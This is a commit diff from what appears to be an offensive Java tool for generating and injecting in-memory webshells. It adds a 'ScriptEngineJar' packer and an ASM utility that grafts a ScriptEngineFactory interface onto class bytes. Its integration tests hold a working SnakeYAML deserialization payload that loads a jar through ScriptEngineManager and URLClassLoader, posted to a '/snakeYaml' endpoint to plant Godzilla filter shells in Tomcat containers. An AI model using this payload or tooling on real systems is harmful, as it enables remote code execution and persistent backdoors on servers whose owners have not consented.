feat: support scriptEngineJar packer

Author: ReaJason

boot/src/main/java/com/reajason/javaweb/boot/controller/MemShellGeneratorController.java

@@ -8,8 +8,8 @@
 import com.reajason.javaweb.memshell.config.ShellConfig;
 import com.reajason.javaweb.memshell.config.ShellToolConfig;
 import com.reajason.javaweb.packer.AggregatePacker;
+import com.reajason.javaweb.packer.JarPacker;
 import com.reajason.javaweb.packer.Packer;
-import com.reajason.javaweb.packer.jar.JarPacker;
 import org.springframework.web.bind.annotation.*;
 
 import java.util.Base64;
@@ -29,12 +29,12 @@ public MemShellGenerateResponse generate(@RequestBody MemShellGenerateRequest re
         InjectorConfig injectorConfig = request.getInjectorConfig();
         MemShellResult generateResult = MemShellGenerator.generate(shellConfig, injectorConfig, shellToolConfig);
         Packer packer = request.getPacker().getInstance();
+        if (packer instanceof AggregatePacker) {
+            return new MemShellGenerateResponse(generateResult, ((AggregatePacker) packer).packAll(generateResult.toClassPackerConfig()));
+        }
         if (packer instanceof JarPacker) {
             return new MemShellGenerateResponse(generateResult, Base64.getEncoder().encodeToString(((JarPacker) packer).packBytes(generateResult.toJarPackerConfig())));
-        } else if (packer instanceof AggregatePacker) {
-            return new MemShellGenerateResponse(generateResult, ((AggregatePacker) packer).packAll(generateResult.toClassPackerConfig()));
-        } else {
-            return new MemShellGenerateResponse(generateResult, packer.pack(generateResult.toClassPackerConfig()));
         }
+        return new MemShellGenerateResponse(generateResult, packer.pack(generateResult.toClassPackerConfig()));
     }
 }

integration-test/src/test/java/com/reajason/javaweb/integration/ShellAssertion.java

@@ -8,11 +8,9 @@
 import com.reajason.javaweb.memshell.MemShellResult;
 import com.reajason.javaweb.memshell.ShellType;
 import com.reajason.javaweb.memshell.config.*;
+import com.reajason.javaweb.packer.JarPacker;
 import com.reajason.javaweb.packer.Packers;
-import com.reajason.javaweb.packer.jar.AgentJarPacker;
-import com.reajason.javaweb.packer.jar.AgentJarWithJDKAttacherPacker;
-import com.reajason.javaweb.packer.jar.AgentJarWithJREAttacherPacker;
-import com.reajason.javaweb.packer.jar.JarPacker;
+import com.reajason.javaweb.packer.jar.*;
 import com.reajason.javaweb.suo5.Suo5Manager;
 import lombok.SneakyThrows;
 import lombok.extern.slf4j.Slf4j;
@@ -21,12 +19,12 @@
 import okhttp3.OkHttpClient;
 import okhttp3.Request;
 import okhttp3.Response;
-import org.testcontainers.containers.Container;
-import org.testcontainers.containers.GenericContainer;
 import org.apache.commons.io.FileUtils;
 import org.apache.commons.lang3.RandomStringUtils;
 import org.apache.commons.lang3.StringUtils;
 import org.apache.commons.lang3.tuple.Pair;
+import org.testcontainers.containers.Container;
+import org.testcontainers.containers.GenericContainer;
 import org.testcontainers.utility.MountableFile;
 
 import java.io.IOException;
@@ -107,6 +105,27 @@ public static void shellInjectIsOk(String url, String server, String serverVersi
     @SneakyThrows
     public static void packerResultAndInject(MemShellResult generateResult, String url, String shellTool, String shellType, Packers packer, GenericContainer<?> appContainer) {
         String content = null;
+        injectAgentJar(generateResult, shellTool, shellType, packer, appContainer);
+        if (packer.getInstance() instanceof ScriptEngineJarPacker) {
+            byte[] bytes = ((JarPacker) packer.getInstance()).packBytes(generateResult.toJarPackerConfig());
+            Path tempJar = Files.createTempFile("temp", "jar");
+            Files.write(tempJar, bytes);
+            String jarPath = "/" + shellTool + shellType + packer.name() + ".jar";
+            appContainer.copyFileToContainer(MountableFile.forHostPath(tempJar, 0100666), jarPath);
+            FileUtils.deleteQuietly(tempJar.toFile());
+            content = "!!javax.script.ScriptEngineManager [\n" +
+                    "  !!java.net.URLClassLoader [[\n" +
+                    "    !!java.net.URL [\"file://" + jarPath + "\"]\n" +
+                    "  ]]\n" +
+                    "]";
+        } else {
+            content = packer.getInstance().pack(generateResult.toClassPackerConfig());
+        }
+        injectIsOk(url, shellType, shellTool, content, packer, appContainer);
+        log.info("send inject payload successfully");
+    }
+
+    private static void injectAgentJar(MemShellResult generateResult, String shellTool, String shellType, Packers packer, GenericContainer<?> appContainer) throws IOException, InterruptedException {
         if (packer.getInstance() instanceof AgentJarPacker) {
             byte[] bytes = ((JarPacker) packer.getInstance()).packBytes(generateResult.toJarPackerConfig());
             Path tempJar = Files.createTempFile("temp", "jar");
@@ -143,13 +162,10 @@ public static void packerResultAndInject(MemShellResult generateResult, String u
             assertThat(stdout, anyOf(
                     containsString("ok")
             ));
-        } else {
-            content = packer.getInstance().pack(generateResult.toClassPackerConfig());
-            injectIsOk(url, shellType, shellTool, content, packer, appContainer);
-            log.info("send inject payload successfully");
         }
     }
 
+
     @SneakyThrows
     public static void assertShellIsOk(MemShellResult generateResult, String shellUrl, String shellTool, String shellType, GenericContainer<?> appContainer, GenericContainer<?> pythonContainer) {
         switch (shellTool) {
@@ -365,6 +381,7 @@ public static void injectIsOk(String url, String shellType, String shellTool, St
             case JavaCommonsCollections4 -> VulTool.postIsOk(url + "/java_deserialize/cc40", content);
             case HessianDeserialize -> VulTool.postIsOk(url + "/hessian", content);
             case Hessian2Deserialize -> VulTool.postIsOk(url + "/hessian2", content);
+            case ScriptEngineJar -> VulTool.postIsOk(url + "/snakeYaml", content);
             case XMLDecoderScriptEngine, XMLDecoderDefineClass -> VulTool.postIsOk(url + "/xmlDecoder", content);
             case Base64 -> VulTool.postIsOk(url + "/b64", content);
             case BigInteger -> VulTool.postIsOk(url + "/biginteger", content);

integration-test/src/test/java/com/reajason/javaweb/integration/memshell/tomcat/Tomcat8DeserializeContainerTest.java

@@ -52,7 +52,8 @@ static Stream<Arguments> casesProvider() {
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.HessianDeserialize),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.Hessian2Deserialize),
                 arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.XMLDecoderScriptEngine),
-                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.XMLDecoderDefineClass)
+                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.XMLDecoderDefineClass),
+                arguments(imageName, ShellType.FILTER, ShellTool.Godzilla, Packers.ScriptEngineJar)
         );
     }
 

memshell-party-common/src/main/java/com/reajason/javaweb/asm/ClassInterfaceUtils.java

@@ -0,0 +1,47 @@
+package com.reajason.javaweb.asm;
+
+import org.objectweb.asm.ClassReader;
+import org.objectweb.asm.ClassVisitor;
+import org.objectweb.asm.ClassWriter;
+import org.objectweb.asm.Opcodes;
+
+/**
+ * @author ReaJason
+ * @since 2025/11/16
+ */
+public class ClassInterfaceUtils {
+
+    public static byte[] addInterface(byte[] bytes, String interfaceName) {
+        ClassReader cr = new ClassReader(bytes);
+        ClassWriter cw = new ClassWriter(cr, 0);
+        ClassVisitor cv = new AddInterfaceClassAdapter(cw, interfaceName.replace('.', '/'));
+        cr.accept(cv, 0);
+        return cw.toByteArray();
+    }
+
+
+    static class AddInterfaceClassAdapter extends ClassVisitor {
+
+        private final String interfaceToAdd;
+
+        public AddInterfaceClassAdapter(ClassVisitor cv, String interfaceToAdd) {
+            super(Opcodes.ASM9, cv);
+            this.interfaceToAdd = interfaceToAdd;
+        }
+
+        @Override
+        public void visit(int version, int access, String name,
+                          String signature, String superName, String[] interfaces) {
+            for (String itf : interfaces) {
+                if (itf.equals(interfaceToAdd)) {
+                    super.visit(version, access, name, signature, superName, interfaces);
+                    return;
+                }
+            }
+            String[] newInterfaces = new String[interfaces.length + 1];
+            System.arraycopy(interfaces, 0, newInterfaces, 0, interfaces.length);
+            newInterfaces[interfaces.length] = interfaceToAdd;
+            super.visit(version, access, name, signature, superName, newInterfaces);
+        }
+    }
+}

memshell-party-common/src/test/java/com/reajason/javaweb/asm/ClassInterfaceUtilsTest.java

@@ -0,0 +1,120 @@
+package com.reajason.javaweb.asm;
+
+import net.bytebuddy.ByteBuddy;
+import org.junit.jupiter.api.Test;
+import org.objectweb.asm.ClassReader;
+
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineFactory;
+import java.io.Serializable;
+import java.util.Collections;
+import java.util.List;
+
+import static org.junit.jupiter.api.Assertions.assertEquals;
+
+/**
+ * @author ReaJason
+ * @since 2025/11/16
+ */
+class ClassInterfaceUtilsTest {
+
+    @Test
+    void test() {
+        String interfaceName = "javax.script.ScriptEngineFactory";
+        byte[] bytes = new ByteBuddy().redefine(EmptyInterface.class).make().getBytes();
+        byte[] newBytes = ClassInterfaceUtils.addInterface(bytes, interfaceName);
+        String[] interfaces = new ClassReader(newBytes).getInterfaces();
+        assertEquals(1, interfaces.length);
+        assertEquals(interfaceName.replace(".", "/"), interfaces[0]);
+    }
+
+    @Test
+    void skipAdd(){
+        String interfaceName = "javax.script.ScriptEngineFactory";
+        byte[] bytes = new ByteBuddy().redefine(ScriptEngineFactoryClass.class).make().getBytes();
+        byte[] newBytes = ClassInterfaceUtils.addInterface(bytes, interfaceName);
+        String[] interfaces = new ClassReader(newBytes).getInterfaces();
+        assertEquals(1, interfaces.length);
+        assertEquals(interfaceName.replace(".", "/"), interfaces[0]);
+    }
+
+    @Test
+    void addNewInterface(){
+        String interfaceName = "javax.script.ScriptEngineFactory";
+        byte[] bytes = new ByteBuddy().redefine(Entity.class).make().getBytes();
+        byte[] newBytes = ClassInterfaceUtils.addInterface(bytes, interfaceName);
+        String[] interfaces = new ClassReader(newBytes).getInterfaces();
+        assertEquals(2, interfaces.length);
+        assertEquals("java/io/Serializable", interfaces[0]);
+        assertEquals(interfaceName.replace(".", "/"), interfaces[1]);
+    }
+
+    static class EmptyInterface {
+    }
+
+    static class ScriptEngineFactoryClass implements ScriptEngineFactory {
+        @Override
+        public String getEngineName() {
+            return "";
+        }
+
+        @Override
+        public String getEngineVersion() {
+            return "";
+        }
+
+        @Override
+        public List<String> getExtensions() {
+            return Collections.emptyList();
+        }
+
+        @Override
+        public List<String> getMimeTypes() {
+            return Collections.emptyList();
+        }
+
+        @Override
+        public List<String> getNames() {
+            return Collections.emptyList();
+        }
+
+        @Override
+        public String getLanguageName() {
+            return "";
+        }
+
+        @Override
+        public String getLanguageVersion() {
+            return "";
+        }
+
+        @Override
+        public Object getParameter(String key) {
+            return null;
+        }
+
+        @Override
+        public String getMethodCallSyntax(String obj, String m, String... args) {
+            return "";
+        }
+
+        @Override
+        public String getOutputStatement(String toDisplay) {
+            return "";
+        }
+
+        @Override
+        public String getProgram(String... statements) {
+            return "";
+        }
+
+        @Override
+        public ScriptEngine getScriptEngine() {
+            return null;
+        }
+    }
+
+    static class Entity implements Serializable {
+
+    }
+}

packer/src/main/java/com/reajason/javaweb/packer/jar/JarPacker.java renamed to packer/src/main/java/com/reajason/javaweb/packer/JarPacker.java

@@ -1,7 +1,4 @@
-package com.reajason.javaweb.packer.jar;
-
-import com.reajason.javaweb.packer.JarPackerConfig;
-import com.reajason.javaweb.packer.Packer;
+package com.reajason.javaweb.packer;
 
 /**
  * @author ReaJason

packer/src/main/java/com/reajason/javaweb/packer/Packers.java

@@ -19,10 +19,7 @@
 import com.reajason.javaweb.packer.h2.H2JSPacker;
 import com.reajason.javaweb.packer.h2.H2JavacPacker;
 import com.reajason.javaweb.packer.h2.H2Packer;
-import com.reajason.javaweb.packer.jar.AgentJarPacker;
-import com.reajason.javaweb.packer.jar.AgentJarWithJDKAttacherPacker;
-import com.reajason.javaweb.packer.jar.AgentJarWithJREAttacherPacker;
-import com.reajason.javaweb.packer.jar.DefaultJarPacker;
+import com.reajason.javaweb.packer.jar.*;
 import com.reajason.javaweb.packer.jexl.JEXLPacker;
 import com.reajason.javaweb.packer.jinjava.JinJavaPacker;
 import com.reajason.javaweb.packer.jsp.ClassLoaderJspPacker;
@@ -72,7 +69,13 @@ public enum Packers {
     Base64URLEncoded(new Base64URLEncoded(), Base64Packer.class),
     GzipBase64(new GzipBase64Packer(), Base64Packer.class),
 
-    Jar(new DefaultJarPacker()),
+    /**
+     * JSP 打包器
+     */
+    JSP(new JspPacker()),
+    ClassLoaderJSP(new ClassLoaderJspPacker(), JspPacker.class),
+    DefineClassJSP(new DefineClassJspPacker(), JspPacker.class),
+    JSPX(new JspxPacker(), JspPacker.class),
 
     /**
      * BigInteger
@@ -84,14 +87,6 @@ public enum Packers {
      */
     BCEL(new BCELPacker()),
 
-    /**
-     * JSP 打包器
-     */
-    JSP(new JspPacker()),
-    ClassLoaderJSP(new ClassLoaderJspPacker(), JspPacker.class),
-    DefineClassJSP(new DefineClassJspPacker(), JspPacker.class),
-    JSPX(new JspxPacker(), JspPacker.class),
-
     /**
      * 脚本引擎打包器
      */
@@ -168,6 +163,9 @@ public enum Packers {
     H2Javac(new H2JavacPacker(), H2Packer.class),
     H2JS(new H2JSPacker(), H2Packer.class),
 
+    Jar(new DefaultJarPacker()),
+    ScriptEngineJar(new ScriptEngineJarPacker()),
+
     XxlJob(new XxlJobPacker()),
     ;
     private final Packer instance;

packer/src/main/java/com/reajason/javaweb/packer/jar/AgentJarPacker.java

@@ -2,6 +2,7 @@
 
 import com.reajason.javaweb.ClassBytesShrink;
 import com.reajason.javaweb.asm.ClassRenameUtils;
+import com.reajason.javaweb.packer.JarPacker;
 import com.reajason.javaweb.packer.JarPackerConfig;
 import lombok.SneakyThrows;
 import org.apache.commons.io.IOUtils;

packer/src/main/java/com/reajason/javaweb/packer/jar/AgentJarWithJDKAttacherPacker.java

@@ -2,6 +2,7 @@
 
 import com.reajason.javaweb.ClassBytesShrink;
 import com.reajason.javaweb.asm.ClassRenameUtils;
+import com.reajason.javaweb.packer.JarPacker;
 import com.reajason.javaweb.packer.JarPackerConfig;
 import com.reajason.javaweb.packer.jar.attach.Attacher;
 import com.reajason.javaweb.packer.jar.attach.VirtualMachine;

packer/src/main/java/com/reajason/javaweb/packer/jar/AgentJarWithJREAttacherPacker.java

@@ -2,6 +2,7 @@
 
 import com.reajason.javaweb.ClassBytesShrink;
 import com.reajason.javaweb.asm.ClassRenameUtils;
+import com.reajason.javaweb.packer.JarPacker;
 import com.reajason.javaweb.packer.JarPackerConfig;
 import com.reajason.javaweb.packer.jar.attach.Attacher;
 import com.reajason.javaweb.packer.jar.attach.VirtualMachine;